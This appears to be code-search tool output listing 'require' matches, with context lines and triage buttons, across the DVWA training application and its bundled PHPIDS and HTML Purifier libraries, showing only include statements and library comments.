./vulnerabilities/sqli/index.php:30 (22/99) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/sqli/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'sqli';
33-$page[ 'source_button' ] = 'sqli';
./vulnerabilities/view_source_all.php:3 (23/99) OK | Dubious | Bad | Hide
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./vulnerabilities/xss_s/index.php:4 (24/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_s/index.php:30 (25/99) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/xss_s/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'xss_s';
33-$page[ 'source_button' ] = 'xss_s';
./vulnerabilities/xss_r/index.php:4 (26/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_r/index.php:30 (27/99) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/xss_r/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'xss_r';
33-$page[ 'source_button' ] = 'xss_r';
./external/phpids/0.6/docs/examples/example.php:30 (28/99) OK | Dubious | Bad | Hide
27-    session_start();
28-}
29-
30:require_once 'IDS/Init.php';
31-
32-try {
33-
./external/phpids/0.6/docs/examples/example.php:87 (29/99) OK | Dubious | Bad | Hide
84-        /*
85-        * The following steps are optional to log the results
86-        */
87:        require_once 'IDS/Log/File.php';
88:        require_once 'IDS/Log/Composite.php';
89-
90-        $compositeLog = new IDS_Log_Composite();
91-        $compositeLog->addLogger(IDS_Log_File::getInstance($init));
./external/phpids/0.6/docs/examples/example.php:101 (30/99) OK | Dubious | Bad | Hide
98-        */
99-        /*
100-        *
101:        require_once 'IDS/Log/Email.php';
102:        require_once 'IDS/Log/Database.php';
103-
104-        $compositeLog->addLogger(
105-            IDS_Log_Email::getInstance($init),
./external/phpids/0.6/docs/examples/cakephp/ids.php:114 (31/99) OK | Dubious | Bad | Hide
111-        $path = get_include_path();
112-        set_include_path( VENDORS . 'phpids/');
113-
114:        #require the needed files
115-        vendor('phpids/IDS/Init');
116-
117-        #add request url and user agent
./external/phpids/0.6/tests/IDS/ReportTest.php:22 (32/99) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:ReportTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Report.php';
25:require_once 'IDS/Event.php';
26-
27-class IDS_ReportTest extends PHPUnit_Framework_TestCase
28-{
./external/phpids/0.6/tests/IDS/MonitorTest.php:21 (33/99) OK | Dubious | Bad | Hide
18- * @package	PHPIDS tests
19- * @version	SVN: $Id:MonitorTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21:require_once 'PHPUnit/Framework/TestCase.php';
22-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
23:require_once 'IDS/Monitor.php';
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Filter/Storage.php';
26-
27-class IDS_MonitorTest extends PHPUnit_Framework_TestCase {
28-
./external/phpids/0.6/tests/IDS/EventTest.php:22 (34/99) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:EventTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Event.php';
25:require_once 'IDS/Filter.php';
26-
27-class IDS_EventTest extends PHPUnit_Framework_TestCase
28-{
./external/phpids/0.6/tests/IDS/ExceptionTest.php:22 (35/99) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:ExceptionTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Caching/Factory.php';
26:require_once 'IDS/Report.php';
27:require_once 'IDS/Event.php';
28:require_once 'IDS/Filter.php';
29:require_once 'IDS/Monitor.php';
30:require_once 'IDS/Filter/Storage.php';
31-
32-class IDS_ExceptionTest extends PHPUnit_Framework_TestCase
33-{
./external/phpids/0.6/tests/IDS/FilterTest.php:22 (36/99) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:FilterTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25-
26-class IDS_FilterTest extends PHPUnit_Framework_TestCase
27-	{
./external/phpids/0.6/tests/IDS/InitTest.php:22 (37/99) OK | Dubious | Bad | Hide
19- * @version    SVN: $Id:InitTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25-
26-class IDS_InitTest extends PHPUnit_Framework_TestCase {
27-
./external/phpids/0.6/tests/IDS/CachingTest.php:22 (38/99) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:CachingTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Caching/Factory.php';
26-
27-class IDS_CachingTest extends PHPUnit_Framework_TestCase {
28-
./external/phpids/0.6/tests/allTests.php:22 (39/99) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:allTests.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-error_reporting(E_ALL | E_STRICT | @E_DEPRECATED);
22:require_once 'PHPUnit/Framework/TestSuite.php';
23:require_once 'PHPUnit/TextUI/TestRunner.php';
24:require_once 'PHPUnit/Util/Filter.php';
25-
26-PHPUnit_Util_Filter::addDirectoryToFilter(dirname(__FILE__));
27-PHPUnit_Util_Filter::addDirectoryToFilter(dirname(__FILE__) . '/../lib/IDS/vendors');
./external/phpids/0.6/tests/allTests.php:45 (40/99) OK | Dubious | Bad | Hide
42-	public static function suite()
43-	{
44-        $suite = new PHPUnit_Framework_TestSuite('PHPIDS');
45:        require_once 'IDS/MonitorTest.php';
46-        $suite->addTestSuite('IDS_MonitorTest');
47:        require_once 'IDS/ReportTest.php';
48-        $suite->addTestSuite('IDS_ReportTest');
49:        require_once 'IDS/InitTest.php';
50-        $suite->addTestSuite('IDS_InitTest');
51:        require_once 'IDS/ExceptionTest.php';
52-        $suite->addTestSuite('IDS_ExceptionTest');
53:        require_once 'IDS/FilterTest.php';
54-        $suite->addTestSuite('IDS_FilterTest');
55:        require_once 'IDS/CachingTest.php';
56-        $suite->addTestSuite('IDS_CachingTest');
57:        require_once 'IDS/EventTest.php';
58-        $suite->addTestSuite('IDS_EventTest');
59-        return $suite;
60-	}
./external/phpids/0.6/lib/IDS/Filter/Storage.php:39 (41/99) OK | Dubious | Bad | Hide
36- *
37- * This class provides various default functions for gathering filter patterns 
38- * to be used later on by the detection mechanism. You might extend this class 
39: * to your requirements.
40- *
41- * @category  Security
42- * @package   PHPIDS
./external/phpids/0.6/lib/IDS/Caching/Session.php:34 (42/99) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/Memcached.php:34 (43/99) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/File.php:34 (44/99) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/Database.php:34 (45/99) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * Needed SQL:
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/Validator.php:112 (46/99) OK | Dubious | Bad | Hide
109-        // END - handled by InterchangeBuilder
110-        
111-        if (!is_null($d->allowed) || !empty($d->valueAliases)) {
112:            // allowed and valueAliases require that we be dealing with
113-            // strings, so check for that early.
114-            $d_int = HTMLPurifier_VarParser::$types[$d->type];
115-            if (!isset(HTMLPurifier_VarParser::$stringTypes[$d_int])) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/InterchangeBuilder.php:77 (47/99) OK | Dubious | Bad | Hide
74-    public function buildDirective($interchange, $hash) {
75-        $directive = new HTMLPurifier_ConfigSchema_Interchange_Directive();
76-        
77:        // These are required elements:
78-        $directive->id = $this->id($hash->offsetGet('ID'));
79-        $id = $directive->id->toString(); // convenience
80-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/SafeParam.php:6 (48/99) OK | Dubious | Bad | Hide
3-/**
4- * Validates name/value pairs in param tags to be used in safe objects. This
5- * will only allow name values it recognizes, and pre-fill certain attributes
6: * with required values.
7- * 
8- * @note
9- *      This class only supports Flash. In the future, Quicktime support
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/ScriptRequired.php:4 (49/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-/**
4: * Implements required attribute stipulation for <script>
5- */
6-class HTMLPurifier_AttrTransform_ScriptRequired extends HTMLPurifier_AttrTransform
7-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter.php:10 (50/99) OK | Dubious | Bad | Hide
7- * including transformation or blacklisting.
8- * 
9- * @warning This filter is called before scheme object validation occurs.
10: *          Make sure, if you require a specific scheme object, you
11- *          you check that it exists. This allows filters to convert
12- *          proprietary URI schemes into regular ones.
13- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/FontFamily.php:76 (51/99) OK | Dubious | Bad | Hide
73-                continue;
74-            }
75-            
76:            // complicated font, requires quoting
77-            
78-            // armor single quotes and new lines
79-            $font = str_replace("\\", "\\\\", $font);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI/IPv6.php:6 (52/99) OK | Dubious | Bad | Hide
3-/**
4- * Validates an IPv6 address.
5- * @author Feyd @ forums.devnetwork.net (public domain)
6: * @note This function requires brackets to have been removed from address
7- *       in URI.
8- */
9-class HTMLPurifier_AttrDef_URI_IPv6 extends HTMLPurifier_AttrDef_URI_IPv4
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/FixNesting.php:8 (53/99) OK | Dubious | Bad | Hide
5- * 
6- * HTML elements dictate which elements are allowed to be their children,
7- * for example, you can't have a p tag in a span tag.  Other elements have
8: * much more rigorous definitions: tables, for instance, require a specific
9- * order for their elements.  There are also constraints not expressible by
10- * document type definitions, such as the chameleon nature of ins/del
11- * tags and global child exclusions.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/FixNesting.php:17 (54/99) OK | Dubious | Bad | Hide
14- * nodes (not tokens) of the list of tokens and determine whether or not
15- * their children conform to the element's definition.  If they do not, the
16- * child definition may optionally supply an amended list of elements that
17: * is valid or require that the entire node be deleted (and the previous
18- * node rescanned).
19- * 
20- * The second objective is to ensure that explicitly excluded elements of
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/RemoveForeignElements.php:76 (55/99) OK | Dubious | Bad | Hide
73-                if (isset($definition->info[$token->name])) {
74-                    
75-                    // mostly everything's good, but
76:                    // we need to make sure required attributes are in order
77-                    if (
78-                        ($token instanceof HTMLPurifier_Token_Start || $token instanceof HTMLPurifier_Token_Empty) &&
79:                        $definition->info[$token->name]->required_attr &&
80-                        ($token->name != 'img' || $remove_invalid_img) // ensure config option still works
81-                    ) {
82-                        $attr_validator->validateToken($token, $config, $context);
83-                        $ok = true;
84:                        foreach ($definition->info[$token->name]->required_attr as $name) {
85-                            if (!isset($token->attr[$name])) {
86-                                $ok = false;
87-                                break;
88-                            }
89-                        }
90-                        if (!$ok) {
91:                            if ($e) $e->send(E_ERROR, 'Strategy_RemoveForeignElements: Missing required attribute', $name);
92-                            continue;
93-                        }
94-                        $token->armor['ValidateAttributes'] = true;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:371 (56/99) OK | Dubious | Bad | Hide
368-        // setup injectors -----------------------------------------------------
369-        foreach ($this->info_injector as $i => $injector) {
370-            if ($injector->checkNeeded($config) !== false) {
371:                // remove injector that does not have it's required
372-                // elements/attributes present, and is thus not needed.
373-                unset($this->info_injector[$i]);
374-            }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Bootstrap.php:40 (57/99) OK | Dubious | Bad | Hide
37-    public static function autoload($class) {
38-        $file = HTMLPurifier_Bootstrap::getPath($class);
39-        if (!$file) return false;
40:        require HTMLPURIFIER_PREFIX . '/' . $file;
41-        return true;
42-    }
43-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:3723 (58/99) OK | Dubious | Bad | Hide
3720-    }
3721-
3722-    private function clearTheActiveFormattingElementsUpToTheLastMarker() {
3723:        /* When the steps below require the UA to clear the list of active
3724-        formatting elements up to the last marker, the UA must perform the
3725-        following steps: */
3726-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:3744 (59/99) OK | Dubious | Bad | Hide
3741-    }
3742-
3743-    private function generateImpliedEndTags($exclude = array()) {
3744:        /* When the steps below require the UA to generate implied end tags,
3745-        then, if the current node is a dd element, a dt element, an li element,
3746-        a p element, a td element, a th  element, or a tr element, the UA must
3747-        act as if an end tag with the respective tag name had been seen and
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:3773 (60/99) OK | Dubious | Bad | Hide
3770-    }
3771-
3772-    private function clearStackToTableContext($elements) {
3773:        /* When the steps above require the UA to clear the stack back to a
3774-        table context, it means that the UA must, while the current node is not
3775-        a table element or an html element, pop elements from the stack of open
3776-        elements. If this causes any elements to be popped from the stack, then
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:75 (61/99) OK | Dubious | Bad | Hide
72-    public $descendants_are_inline = false;
73-    
74-    /**
75:     * List of the names of required attributes this element has. Dynamically
76-     * populated by HTMLPurifier_HTMLDefinition::getElement
77-     */
78:    public $required_attr = array();
79-    
80-    /**
81-     * Lookup table of tags excluded from all descendants of this tag.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:94 (62/99) OK | Dubious | Bad | Hide
91-            
92-            if (isset($processed[$def_i])) continue;
93-            
94:            // determine whether or not attribute is required
95:            if ($required = (strpos($def_i, '*') !== false)) {
96-                // rename the definition
97-                unset($attr[$def_i]);
98-                $def_i = trim($def_i, '*');
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:106 (63/99) OK | Dubious | Bad | Hide
103-            
104-            // if we've already got a literal object, move on
105-            if (is_object($def)) {
106:                // preserve previous required
107:                $attr[$def_i]->required = ($required || $attr[$def_i]->required);
108-                continue;
109-            }
110-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:118 (64/99) OK | Dubious | Bad | Hide
115-            
116-            if ($t = $attr_types->get($def)) {
117-                $attr[$def_i] = $t;
118:                $attr[$def_i]->required = $required;
119-            } else {
120-                unset($attr[$def_i]);
121-            }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Injector/AutoParagraph.php:314 (65/99) OK | Dubious | Bad | Hide
311-    }
312-    
313-    /**
314:     * Determines if a particular token requires an earlier inline token
315-     * to get a paragraph. This should be used with _forwardUntilEndToken
316-     */
317-    private function _checkNeedsP($current) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:23 (66/99) OK | Dubious | Bad | Hide
20- * convenience functions for subclasses.
21- * 
22- * @note The unit tests will instantiate this class for testing purposes, as
23: *       many of the utility functions require a class to be instantiated.
24- *       This means that, even though this class is not runnable, it will
25- *       not be declared abstract.
26- *
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:176 (67/99) OK | Dubious | Bad | Hide
173-     */
174-    public function parseData($string) {
175-        
176:        // following functions require at least one character
177-        if ($string === '') return '';
178-        
179-        // subtracts amps that cannot possibly be escaped
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ContentSets.php:115 (68/99) OK | Dubious | Bad | Hide
112-            return $value;
113-        }
114-        switch ($def->content_model_type) {
115:            case 'required':
116-                return new HTMLPurifier_ChildDef_Required($value);
117-            case 'optional':
118-                return new HTMLPurifier_ChildDef_Optional($value);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Bdo.php:19 (69/99) OK | Dubious | Bad | Hide
16-        $bdo = $this->addElement(
17-            'bdo', 'Inline', 'Inline', array('Core', 'Lang'),
18-            array(
19:                'dir' => 'Enum#ltr,rtl', // required
20-                // The Abstract Module specification has the attribute
21-                // inclusions wrong for bdo: bdo allows Lang
22-            )
23-        );
24:        $bdo->attr_transform_post['required-dir'] = new HTMLPurifier_AttrTransform_BdoDir();
25-        
26-        $this->attr_collections['I18N']['dir'] = 'Enum#ltr,rtl';
27-    }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/SafeObject.php:26 (70/99) OK | Dubious | Bad | Hide
23-            'Optional: param | Flow | #PCDATA',
24-            'Common',
25-            array(
26:                // While technically not required by the spec, we're forcing
27-                // it to this value.
28-                'type'   => 'Enum#application/x-shockwave-flash',
29-                'width'  => 'Pixels#' . $max,
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Scripting.php:28 (71/99) OK | Dubious | Bad | Hide
25-        // auto-wraps stray #PCDATA in a similar manner to 
26-        // blockquote's custom definition (we would use it but
27-        // blockquote's contents are optional while noscript's contents
28:        // are required)
29-        
30-        // TODO: convert this to new syntax, main problem is getting
31-        // both content sets working
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Scripting.php:38 (72/99) OK | Dubious | Bad | Hide
35-        $this->info['noscript'] = new HTMLPurifier_ElementDef();
36-        $this->info['noscript']->attr = array( 0 => array('Common') );
37-        $this->info['noscript']->content_model = 'Heading | List | Block';
38:        $this->info['noscript']->content_model_type = 'required';
39-        
40-        $this->info['script'] = new HTMLPurifier_ElementDef();
41-        $this->info['script']->attr = array(
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModuleManager.php:390 (73/99) OK | Dubious | Bad | Hide
387-        // mix it in with
388-        if (!$def) return false;
389-        
390:        // add information on required attributes
391-        foreach ($def->attr as $attr_name => $attr_def) {
392:            if ($attr_def->required) {
393:                $def->required_attr[] = $attr_name;
394-            }
395-        }
396-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:340 (74/99) OK | Dubious | Bad | Hide
337-     * @note This is a DUMB function: it has no concept of keeping
338-     *       character entities that the projected character encoding
339-     *       can allow. We could possibly implement a smart version
340:     *       but that would require it to also know which Unicode
341-     *       codepoints the charset supported (not an easy task).
342-     * @note Sort of with cleanUTF8() but it assumes that $str is
343-     *       well-formed UTF-8
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:379 (75/99) OK | Dubious | Bad | Hide
376-    /**
377-     * This expensive function tests whether or not a given character
378-     * encoding supports ASCII. 7/8-bit encodings like Shift_JIS will
379:     * fail this test, and require special processing. Variable width
380-     * encodings shouldn't ever fail.
381-     * 
382-     * @param string $encoding Encoding name to test, as per iconv format
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ChildDef/Required.php:32 (76/99) OK | Dubious | Bad | Hide
29-        $this->elements = $elements;
30-    }
31-    public $allow_empty = false;
32:    public $type = 'required';
33-    public function validateChildren($tokens_of_children, $config, $context) {
34-        // if there are no tokens, delete parent node
35-        if (empty($tokens_of_children)) return false;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Language/messages/en.php:28 (77/99) OK | Dubious | Bad | Hide
25-'Lexer: Missing end quote'     => 'Attribute declaration has no end quote',
26-
27-'Strategy_RemoveForeignElements: Tag transform'              => '<$1> element transformed into $CurrentToken.Serialized',
28:'Strategy_RemoveForeignElements: Missing required attribute' => '$CurrentToken.Compact element missing required attribute $1',
29-'Strategy_RemoveForeignElements: Foreign element to text'    => 'Unrecognized $CurrentToken.Serialized tag converted to text',
30-'Strategy_RemoveForeignElements: Foreign element removed'    => 'Unrecognized $CurrentToken.Serialized tag removed',
31-'Strategy_RemoveForeignElements: Comment removed'            => 'Comment containing "$CurrentToken.Data" removed',
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrValidator.php:4 (78/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-/**
4: * Validates the attributes of a token. Doesn't manage required attributes
5- * very well. The only reason we factored this out was because RemoveForeignElements
6- * also needed it besides ValidateAttributes.
7- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrValidator.php:14 (79/99) OK | Dubious | Bad | Hide
11-    /**
12-     * Validates the attributes of a token, returning a modified token
13-     * that has valid tokens
14:     * @param $token Reference to token to validate. We require a reference
15-     *     because the operation this class performs on the token are
16-     *     not atomic, so the context CurrentToken to be updated
17-     *     throughout
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef.php:23 (80/99) OK | Dubious | Bad | Hide
20-    public $minimized = false;
21-    
22-    /**
23:     * Tells us whether or not an HTML attribute is required. Has no
24-     * meaning in other contexts
25-     */
26:    public $required = false;
27-    
28-    /**
29-     * Validates and cleans passed string according to a definition.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer/HTMLDefinition.php:156 (81/99) OK | Dubious | Bad | Hide
153-                $ret .= $this->element('td',$this->listifyAttr($def->attr), array(), 0);
154-            $ret .= $this->end('tr');
155-            
156:            if (!empty($def->required_attr)) {
157:                $ret .= $this->row('Required attributes', $this->listify($def->required_attr));
158-            }
159-            
160-            $ret .= $this->renderChildren($def->child);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:6 (82/99) OK | Dubious | Bad | Hide
3-/**
4- * @file
5- * This file was auto-generated by generate-includes.php and includes all of
6: * the core files required by HTML Purifier. Use this if performance is a
7- * primary concern and you are using an opcode cache. PLEASE DO NOT EDIT THIS
8- * FILE, changes will be overwritten the next time the script is run.
9- *
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:14 (83/99) OK | Dubious | Bad | Hide
11- * 
12- * @warning
13- *      You must *not* include any other HTML Purifier files before this file,
14: *      because 'require' not 'require_once' is used.
15- * 
16- * @warning
17: *      This file requires that the include path contains the HTML Purifier
18- *      library directory; this is not auto-set.
19- */
20-
21:require 'HTMLPurifier.php';
22:require 'HTMLPurifier/AttrCollections.php';
23:require 'HTMLPurifier/AttrDef.php';
24:require 'HTMLPurifier/AttrTransform.php';
25:require 'HTMLPurifier/AttrTypes.php';
26:require 'HTMLPurifier/AttrValidator.php';
27:require 'HTMLPurifier/Bootstrap.php';
28:require 'HTMLPurifier/Definition.php';
29:require 'HTMLPurifier/CSSDefinition.php';
30:require 'HTMLPurifier/ChildDef.php';
31:require 'HTMLPurifier/Config.php';
32:require 'HTMLPurifier/ConfigSchema.php';
33:require 'HTMLPurifier/ContentSets.php';
34:require 'HTMLPurifier/Context.php';
35:require 'HTMLPurifier/DefinitionCache.php';
36:require 'HTMLPurifier/DefinitionCacheFactory.php';
37:require 'HTMLPurifier/Doctype.php';
38:require 'HTMLPurifier/DoctypeRegistry.php';
39:require 'HTMLPurifier/ElementDef.php';
40:require 'HTMLPurifier/Encoder.php';
41:require 'HTMLPurifier/EntityLookup.php';
42:require 'HTMLPurifier/EntityParser.php';
43:require 'HTMLPurifier/ErrorCollector.php';
44:require 'HTMLPurifier/ErrorStruct.php';
45:require 'HTMLPurifier/Exception.php';
46:require 'HTMLPurifier/Filter.php';
47:require 'HTMLPurifier/Generator.php';
48:require 'HTMLPurifier/HTMLDefinition.php';
49:require 'HTMLPurifier/HTMLModule.php';
50:require 'HTMLPurifier/HTMLModuleManager.php';
51:require 'HTMLPurifier/IDAccumulator.php';
52:require 'HTMLPurifier/Injector.php';
53:require 'HTMLPurifier/Language.php';
54:require 'HTMLPurifier/LanguageFactory.php';
55:require 'HTMLPurifier/Length.php';
56:require 'HTMLPurifier/Lexer.php';
57:require 'HTMLPurifier/PercentEncoder.php';
58:require 'HTMLPurifier/Strategy.php';
59:require 'HTMLPurifier/StringHash.php';
60:require 'HTMLPurifier/StringHashParser.php';
61:require 'HTMLPurifier/TagTransform.php';
62:require 'HTMLPurifier/Token.php';
63:require 'HTMLPurifier/TokenFactory.php';
64:require 'HTMLPurifier/URI.php';
65:require 'HTMLPurifier/URIDefinition.php';
66:require 'HTMLPurifier/URIFilter.php';
67:require 'HTMLPurifier/URIParser.php';
68:require 'HTMLPurifier/URIScheme.php';
69:require 'HTMLPurifier/URISchemeRegistry.php';
70:require 'HTMLPurifier/UnitConverter.php';
71:require 'HTMLPurifier/VarParser.php';
72:require 'HTMLPurifier/VarParserException.php';
73:require 'HTMLPurifier/AttrDef/CSS.php';
74:require 'HTMLPurifier/AttrDef/Enum.php';
75:require 'HTMLPurifier/AttrDef/Integer.php';
76:require 'HTMLPurifier/AttrDef/Lang.php';
77:require 'HTMLPurifier/AttrDef/Switch.php';
78:require 'HTMLPurifier/AttrDef/Text.php';
79:require 'HTMLPurifier/AttrDef/URI.php';
80:require 'HTMLPurifier/AttrDef/CSS/Number.php';
81:require 'HTMLPurifier/AttrDef/CSS/AlphaValue.php';
82:require 'HTMLPurifier/AttrDef/CSS/Background.php';
83:require 'HTMLPurifier/AttrDef/CSS/BackgroundPosition.php';
84:require 'HTMLPurifier/AttrDef/CSS/Border.php';
85:require 'HTMLPurifier/AttrDef/CSS/Color.php';
86:require 'HTMLPurifier/AttrDef/CSS/Composite.php';
87:require 'HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php';
88:require 'HTMLPurifier/AttrDef/CSS/Filter.php';
89:require 'HTMLPurifier/AttrDef/CSS/Font.php';
90:require 'HTMLPurifier/AttrDef/CSS/FontFamily.php';
91:require 'HTMLPurifier/AttrDef/CSS/ImportantDecorator.php';
92:require 'HTMLPurifier/AttrDef/CSS/Length.php';
93:require 'HTMLPurifier/AttrDef/CSS/ListStyle.php';
94:require 'HTMLPurifier/AttrDef/CSS/Multiple.php';
95:require 'HTMLPurifier/AttrDef/CSS/Percentage.php';
96:require 'HTMLPurifier/AttrDef/CSS/TextDecoration.php';
97:require 'HTMLPurifier/AttrDef/CSS/URI.php';
98:require 'HTMLPurifier/AttrDef/HTML/Bool.php';
99:require 'HTMLPurifier/AttrDef/HTML/Color.php';
100:require 'HTMLPurifier/AttrDef/HTML/FrameTarget.php';
101:require 'HTMLPurifier/AttrDef/HTML/ID.php';
102:require 'HTMLPurifier/AttrDef/HTML/Pixels.php';
103:require 'HTMLPurifier/AttrDef/HTML/Length.php';
104:require 'HTMLPurifier/AttrDef/HTML/LinkTypes.php';
105:require 'HTMLPurifier/AttrDef/HTML/MultiLength.php';
106:require 'HTMLPurifier/AttrDef/HTML/Nmtokens.php';
107:require 'HTMLPurifier/AttrDef/URI/Email.php';
108:require 'HTMLPurifier/AttrDef/URI/Host.php';
109:require 'HTMLPurifier/AttrDef/URI/IPv4.php';
110:require 'HTMLPurifier/AttrDef/URI/IPv6.php';
111:require 'HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php';
112:require 'HTMLPurifier/AttrTransform/Background.php';
113:require 'HTMLPurifier/AttrTransform/BdoDir.php';
114:require 'HTMLPurifier/AttrTransform/BgColor.php';
115:require 'HTMLPurifier/AttrTransform/BoolToCSS.php';
116:require 'HTMLPurifier/AttrTransform/Border.php';
117:require 'HTMLPurifier/AttrTransform/EnumToCSS.php';
